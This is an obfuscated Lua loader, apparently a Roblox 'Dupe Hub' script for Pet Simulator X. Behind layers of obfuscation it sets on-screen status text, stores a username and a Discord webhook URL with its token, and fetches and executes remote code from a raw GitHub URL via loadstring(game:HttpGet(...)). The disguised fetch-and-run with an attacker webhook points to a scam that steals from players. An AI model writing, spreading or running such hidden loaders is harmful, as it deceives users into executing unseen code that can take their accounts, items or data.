--[[ .____ ________ ___. _____ __ | | __ _______ \_____ \\_ |___/ ____\_ __ ______ ____ _____ _/ |_ ___________ | | | | \__ \ / | \| __ \ __\ | \/ ___// ___\\__ \\ __\/ _ \_ __ \ | |___| | // __ \_/ | \ \_\ \ | | | /\___ \\ \___ / __ \| | ( <_> ) | \/ |_______ \____/(____ /\_______ /___ /__| |____//____ >\___ >____ /__| \____/|__| \/ \/ \/ \/ \/ \/ \/ \_Welcome to LuaObfuscator.com (Alpha 0.2.5) ~ Much Love, Ferib ]]-- do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==5) then v16=nil;v16=function(v17,v18,...)local v27=1;local v28;v17=v5(v4(v17,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v77=v3(v1(v29,16));if v28 then local v83=v6(v77,v28);v28=nil;return v83;else return v77;end end end);local function v30(v31,v32,v33)if v33 then local v78=(v31/((1 + 1)^(v32-(529 -((1239 -930) + 219)))))%(((1694 -(621 + 1071)) + 0)^(((v33-(1 + 0)) -(v32-(3 -2))) + 1 + 0)) ;return v78-(v78%(2 -1)) ;else local v79=(8 -6)^(v32-(1 + 0)) ;return (((v31%(v79 + v79))>=v79) and 1) or (203 -(162 + 41)) ;end end local function v34()local v47=0 + 0 ;local v48;while true do if (v47==((1081 + 295) -(1066 + 310))) then v48=v2(v17,v27,v27);v27=v27 + (1 -0) ;v47=1;end if (v47==(1 + 0)) then return v48;end end end local function v35()local v49,v50=v2(v17,v27,v27 + (1931 -(28 + 1901)) );v27=v27 + (1878 -(1164 + 712)) ;return (v50 * (9 + 247)) + v49 ;end local function v36()local v51=0 -0 ;local v52;local v53;local v54;local v55;while true do if (v51==(1 + 0)) then return (v55 * (62580860 -45803644)) + (v54 * ((52952 + 13453) -(591 + 278))) + (v53 * (375 -(77 + 42))) + v52 ;end if (v51==(0 + 0)) then v52,v53,v54,v55=v2(v17,v27,v27 + 1 + 2 );v27=v27 + (491 -(136 + 319 + 32)) ;v51=828 -(73 + 754) ;end end end local function v37()local v56=v36();local v57=v36();local v58=1;local v59=(v30(v57,1 + 0 + 0 ,15 + 3 + 2 ) * ((1 + 1 + 0)^(28 + 4 + 0))) + v56 ;local v60=v30(v57,21,114 -83 );local v61=((v30(v57,2 + 30 )==(1 + 0)) and -(1 + 0)) or 1 ;if (v60==((0 -0) + 0)) then if (v59==((0 -0) -0)) then return v61 * (0 -0) ;else v60=1 + 0 ;v58=0 -0 ;end elseif (v60==(254 + 1793)) then return ((v59==(0 -0)) and (v61 * ((4 -3)/0))) or (v61 * NaN) ;end return v9(v61,v60-(7 + 1016) ) * (v58 + (v59/(2^((114 -90) + 28)))) ;end local function v38(v39)local v62=0 + 0 ;local v63;local v64;while true do if ((1 + 1)==v62) then v64={};for v84=1135 -(672 + 462) , #v63 do v64[v84]=v3(v2(v4(v63,v84,v84)));end v62=(3 + 4) -4 ;end if (v62==(1 -0)) then v63=v4(v17,v27,(v27 + v39) -(1 + 0) );v27=v27 + v39 ;v62=2 -(542 -(515 + 27)) ;end if (v62==(0 + 0)) then v63=nil;if not v39 then v39=v36();if (v39==(0 + 0)) then return "";end end v62=1;end if (v62==(3 + 0)) then return v7(v64);end end end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v65=0;local v66;local v67;local v68;local v69;local v70;local v71;local v72;while true do if ((1 + 0)~=v65) then else v68=nil;v69=nil;v65=1 + 1 ;end if (v65==0) then v66=0;v67=nil;v65=217 -(153 + 63) ;end if (v65==2) then v70=nil;v71=nil;v65=3;end if (v65~=(14 -11)) then else v72=nil;while true do local v86=0 + 0 ;local v87;while true do if (v86~=0) then else v87=0;while true do if (v87~=1) then else if (v66==0) then v67={};v68={};v69={};v66=2 -1 ;end if (v66==(966 -(509 + 456))) then v70={v67,v68,nil,v69};v71=v36();v72={};v66=2;end break;end if (v87~=(0 -0)) then else local v108=0;while true do if (v108==(790 -(334 + 455))) then v87=1760 -(1120 + 639) ;break;end if ((0 + 0)~=v108) then else if (v66==(1102 -(965 + 134))) then local v114=0 -0 ;while true do if (v114==0) then for v137=1 + 0 ,v36() do v68[v137-1 ]=v42();end for v139=2 -1 ,v36() do v69[v139]=v36();end v114=1;end if (v114==1) then return v70;end end end if (v66==2) then for v118=1,v71 do local v119=0;local v120;local v121;local v122;while true do if (v119~=(1 + 0)) then else v122=nil;while true do if (v120~=1) then else if (v121==(679 -(305 + 373))) then v122=v34()~=0 ;elseif (v121==(1 + 1)) then v122=v37();elseif (v121~=3) then else v122=v38();end v72[v118]=v122;break;end if (v120==(0 + 0)) then local v162=574 -(526 + 48) ;while true do if (v162~=(2 -1)) then else v120=1;break;end if (v162==(0 + 0)) then v121=v34();v122=nil;v162=916 -(51 + 864) ;end end end end break;end if (v119==0) then v120=0;v121=nil;v119=1068 -(188 + 879) ;end end end v70[164 -(144 + 17) ]=v34();for v123=3 -2 ,v36() do local v124=0;local v125;while true do if (v124~=0) then else v125=v34();if (v30(v125,1,3 -2 )~=0) then else local v155=1300 -(962 + 338) ;local v156;local v157;local v158;local v159;local v160;while true do if (v155==2) then v160=nil;while true do if ((0 -0)==v156) then local v171=0 -0 ;while true do if (v171==(0 -0)) then v157=0 -0 ;v158=nil;v171=1;end if (v171~=1) then else v156=1;break;end end end if (v156==1) then v159=nil;v160=nil;v156=2;end if (v156==2) then while true do if ((1 + 1)~=v157) then else local v181=0 -0 ;local v182;while true do if (v181~=(1152 -(66 + 1086))) then else v182=0 + 0 ;while true do if (v182~=1) then else v157=11 -8 ;break;end if (v182~=(0 + 0)) then else local v195=0;while true do if (v195==(3 -2)) then v182=1;break;end if (0==v195) then if (v30(v159,2 -1 ,1)~=(1135 -(541 + 593))) then else v160[2]=v72[v160[2]];end if (v30(v159,2,838 -(50 + 786) )==(4 -3)) then v160[1841 -(263 + 1575) ]=v72[v160[3]];end v195=1 + 0 ;end end end end break;end end end if (v157==1) then v160={v35(),v35(),nil,nil};if (v158==(0 -0)) then local v186=0;local v187;local v188;while true do if (v186==(0 + 0)) then v187=1794 -(245 + 1549) ;v188=nil;v186=1;end if ((3 -2)~=v186) then else while true do if (v187~=(1626 -(1598 + 28))) then else v188=1292 -(794 + 498) ;while true do if (v188~=(1110 -(728 + 382))) then else v160[3]=v35();v160[4]=v35();break;end end break;end end break;end end elseif (v158==(1 + 0)) then v160[4 -1 ]=v36();elseif (v158==2) then v160[1 + 2 ]=v36() -((1118 -(577 + 539))^(2 + 14)) ;elseif (v158==(2 + 1)) then local v198=0 -0 ;while true do if (v198==(0 -0)) then v160[1 + 2 ]=v36() -(2^16) ;v160[4]=v35();break;end end end v157=2;end if (v157==(1518 -(1019 + 496))) then if (v30(v159,1 + 2 ,3)==(4 -3)) then v160[2 + 2 ]=v72[v160[7 -3 ]];end v67[v123]=v160;break;end if (v157~=0) then else local v184=0;local v185;while true do if (v184==(0 + 0)) then v185=0 -0 ;while true do if (v185==(1 + 0)) then v157=1;break;end if (v185==(0 -0)) then local v197=0 + 0 ;while true do if (v197~=0) then else v158=v30(v125,2 + 0 ,1236 -(940 + 293) );v159=v30(v125,4,6);v197=1;end if (v197==(1848 -(876 + 971))) then v185=1;break;end end end end break;end end end end break;end end break;end if (v155==(3 -2)) then v158=nil;v159=nil;v155=1 + 1 ;end if (v155~=(1874 -(460 + 1414))) then else v156=0;v157=nil;v155=1 + 0 ;end end end break;end end end v66=539 -(411 + 125) ;end v108=1;end end end end break;end end end break;end end end local function v43(v44,v45,v46)local v73=0;local v74;local v75;local v76;while true do if (v73==0) then v74=v44[1];v75=v44[2];v73=1;end if (v73==1) then v76=v44[3];return function(...)local v88=0;local v89;local v90;local v91;local v92;local v93;while true do if (0==v88) then v89=1;v90= -1;v88=1;end if (v88==1) then v91={...};v92=v13("#",...) -1 ;v88=2;end if (v88==3) then A,B=v41(v12(v93));if not A[1] then local v104=0;local v105;while true do if (v104==0) then v105=v44[4][v89] or "?" ;error("Script error at [" .. v105 .. "]:" .. A[2] );break;end end else return v14(A,2,B);end break;end if (v88==2) then v93=nil;v93=function()local v94=v74;local v95=v75;local v96=v76;local v97=v41;local v98={};local v99={};local v100={};for v106=0,v92 do if ((4776==(3598 + 1178)) and (v106>=v96)) then v98[v106-v96 ]=v91[v106 + 1 + 0 ];else v100[v106]=v91[v106 + (1170 -(49 + 1120)) ];end end local v101=(v92-v96) + ((279 + 1229) -(1196 + 311)) ;local v102;local v103;while true do local v107=1901 -((979 -(28 + 529)) + 1479) ;while true do if (((4902 -(62 + 1236))>(85 + 498 + 1826)) and (1==v107)) then if (((2476 -(2057 -(143 + 1023)))<=(4372 -2450)) and (v103<=(30 -(24 + 1)))) then if (((3369 -2350)<=1077) and (v103<=(2 -0))) then if ((v103<=(1085 -(352 + 733))) or ((2697 + 950)>=(5622 -(339 + 1179)))) then v100[v102[2]]=v46[v102[5 -2 ]];elseif ((v103>(1 + 0)) or (4011==((6500 -(205 + 73)) -2101))) then local v141=0 + 0 ;local v142;local v143;while true do if (((5862 -3962)>(2161 -(25 + 317))) and ((1 + 0)==v141)) then while true do if ((((732 -(45 + 545)) + 439)<=1272) and (v142==(0 -0))) then v143=v102[9 -7 ];v100[v143]=v100[v143](v14(v100,v143 + (296 -((254 -65) + 106)) ,v90));break;end end break;end if (((1920 -(207 + 52))==(1637 + 24)) and (v141==(808 -(121 + 687)))) then v142=(0 -0) -0 ;v143=nil;v141=3 -(4 -2) ;end end else v46[v102[9 -6 ]]=v100[v102[2 -0 ]];end elseif ((v103<=(2 + 1)) or ((5888 -(375 + 653))<=(1684 + 2957))) then v100[v102[2 + 0 ]][v102[4 -1 ]]=v102[5 -1 ];elseif (((2702 -(313 + 1549))<(2412 + 90)) and (v103>4)) then local v146=0 -0 ;local v147;local v148;local v149;while true do if ((v146==(1608 -(1466 + 142))) or (123==(8988 -5770))) then v147=852 -(838 + 14) ;v148=nil;v146=1;end if ((v146==(1 + (1316 -(1161 + 155)))) or (1571<(147 + 180))) then v149=nil;while true do if (((199 + 376)<=(1233 -(163 + 418))) and (v147==((899 -585) -(190 + 4 + 120)))) then local v167=(1354 -(184 + 600)) -(354 + 216) ;while true do if ((v167==(204 -(71 + 132))) or ((4551 -2163)==2215)) then v147=223 -(80 + 142) ;break;end if (((3930 -1762)>1505) and (v167==(0 -0))) then v148=v102[9 -7 ];v149=v100[v102[3]];v167=2 -1 ;end end end if ((v147==((94 + 100) -(70 + 123))) or ((3747 -(71 + 2))<=(239 -(47 + 21)))) then v100[v148 + (1 -0) ]=v149;v100[v148]=v149[v102[558 -(364 + 190) ]];break;end end break;end end else do return;end end elseif ((v103<=(429 -(215 + 206))) or ((6836 -5075)<(1382 -(4 + 65 + 364)))) then if ((v103<=((3090 -(895 + 455)) -(695 + 1039))) or ((2803 + 434 + 155)>=((771 + 5500) -(779 + 883)))) then if ((v100[v102[2 + 0 ]]==v102[13 -9 ]) or ((10392 -6129)>=(2793 + 2147))) then v89=v89 + 1 ;else v89=v102[8 -5 ];end elseif (((9534 -4633)>=1358) and (v103>(20 -(962 -(894 + 55))))) then v100[v102[68 -(2 + 20 + 44) ]]=v102[5 -2 ]~=(0 + 0) ;else v100[v102[1869 -(684 + 1183) ]]=v102[7 -4 ];end elseif (((339 + 6)<(3544 -(42 + 104 + 297))) and (v103<=9)) then local v130=0 + (1164 -(908 + 256)) ;local v131;local v132;local v133;local v134;local v135;local v136;while true do if ((v130==(0 -0)) or (((2917 -(1064 + 894)) + 578)>=(5587 -3033))) then v131=0 + 0 ;v132=nil;v130=1;end if ((v130==(7 -(5 -1))) or ((2933 -(234 + 143))<(3172 -2079))) then while true do if (((3997 + 633)>=(3944 -1433)) and (v131==(0 -0))) then local v163=0 -0 ;while true do if ((v163==((423 -240) -(154 + 28))) or ((1276 + 1121)<=1746)) then v131=1 + 0 ;break;end if ((v163==0) or ((480 + 846)>=(1071 + 2964))) then v132=446 -(43 + 403) ;v133=nil;v163=1 -0 ;end end end if ((v131==(1062 -(301 + 759))) or (4390==((36722 -23188) -10336))) then v136=nil;while true do if (((1536 + 1961)>(3960 -1055)) and (v132==0)) then local v172=0 + 0 ;local v173;while true do if (((130 + 1104)<(1899 + 12 + 363)) and (v172==(1819 -((974 -182) + 1027)))) then v173=0;while true do if ((v173==(1809 -(1170 + 353 + 285))) or ((4067 + 553)<=2261)) then v132=1 + 0 ;break;end if (((2463 + 2040)==(10443 -5940)) and (v173==((64 + 525) -(581 + 8)))) then v133=v102[(5 -1) -2 ];v134,v135=v97(v100[v133](v14(v100,v133 + (1 -(0 -0)) ,v102[2 + 1 ])));v173=1224 -(201 + 772 + 250) ;end end break;end end end if ((v132==1) or (3436==3861)) then local v174=0 + 0 ;local v175;while true do if (((2762 + (5468 -3590))>(1570 -1027)) and (0==v174)) then v175=0 + 0 ;while true do if ((v175==((3869 -2414) -(560 + 895))) or ((2759 -1520)>(3980 -((639 -(9 + 270)) + 552)))) then v90=(v135 + v133) -(1 + 0) ;v136=0 + 0 ;v175=1;end if (((24 + 58)<(857 + (864 -481))) and (v175==(1902 -(1275 + 626)))) then v132=1732 -(452 + 1278) ;break;end end break;end end end if ((v132==(2 -0)) or ((1381 -(42 + 1044))==(1250 -(574 + 33)))) then for v176=v133,v90 do local v177=0 + 0 ;local v178;while true do if ((1166<=3711) and (v177==(1012 -(382 + 630)))) then v178=0 + 0 ;while true do if ((((1399 + 2627) -(688 + 691))>(495 + 991)) and (v178==(0 -(0 + 0)))) then v136=v136 + (543 -(509 + 33)) ;v100[v176]=v134[v136];break;end end break;end end end break;end end break;end if (((1 + 0)==v131) or (2362<(1070 -(221 + 833)))) then local v164=0;while true do if (((1 + 0)==v164) or (2871==(1199 + 1190))) then v131=2 + 0 ;break;end if ((3865<(20170 -15524)) and ((0 -0)==v164)) then v134=nil;v135=nil;v164=1;end end end end break;end if (((1107 + 492)<(2775 -(980 + 45))) and (v130==(1 + (0 -0)))) then v133=nil;v134=nil;v130=5 -3 ;end if ((v130==((1900 -(1536 + 363)) + 1)) or ((1881 + 997)<=(2097 + 341))) then v135=nil;v136=nil;v130=3 + 0 ;end end elseif ((v103==(5 + 5)) or ((218 + 3425)>=(1881 + 1941))) then v89=v102[1 + 2 ];else v100[v102[(4 + 1) -3 ]]();end v89=v89 + 1 + 0 ;break;end if ((v107==((0 -0) -0)) or ((2403 -(155 + 1161))<(60 + 710))) then local v113=(1310 -794) -(379 + 137) ;while true do if ((2516>(2791 -((1632 -547) + 241))) and (v113==0)) then v102=v94[v89];v103=v102[2 -1 ];v113=667 -(365 + 301) ;end if ((v113==(3 -(2 -0))) or (1156==(4426 -((959 -(320 + 395)) + 117)))) then v107=1;break;end end end end end end;v88=3;end end end;end end end return v43(v42(),{},v18)(...);end;v16("LOL!193O00028O00026O001040030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A757374616E6F74686572646D652F70657473696D782O322F6D61696E2F70657473696D6775692O732E6C7561026O00084003023O005F4703053O00546578743303133O00436865636B696E6720536372697074733O2E03053O00546578743403103O005374617274696E6720447570653O2E03083O00557365726E616D65030E3O00465230535433445F53483444305703073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313038353930342O31373531373532353033322F39503151304E36495976524D3955735F5973634C637A535A517A484B69796E51326277726E527073444E782D4D41533651733651572D55686C623972737141496A74454B026O00F03F027O004003053O00546578743103103O00536372697074204C6F616465643O2E03053O00546578743203123O0057616974696E6720666F7220536372697074030D3O006C6F6164696E677363722O656E03103O00437573746F6D5363726970744E616D6503083O00447570652048756200293O0012073O00013O0026063O000B0001000200040A3O000B000100122O000100033O00122O000200043O002005000200020005001207000400064O0009000200044O000200013O00022O000B00010001000100040A3O002800010026063O00120001000700040A3O0012000100122O000100083O00300300010009000A00122O000100083O0030030001000B000C0012073O00023O0026063O00190001000100040A3O001900010012070001000E3O0012010001000D3O001207000100103O0012010001000F3O0012073O00113O0026063O00200001001200040A3O0020000100122O000100083O00300300010013001400122O000100083O0030030001001500160012073O00073O0026063O00010001001100040A3O000100012O0008000100013O001201000100173O00122O000100083O0030030001001800190012073O00123O00040A3O000100012O00043O00017O00293O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000D3O000D3O000E3O000E3O000F3O000F3O00103O00123O00123O00133O00133O00143O00143O00153O00173O00173O00183O00183O00193O00193O001A3O001B3O001D3O00",v10(),...);break;end if (1==v0) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end end end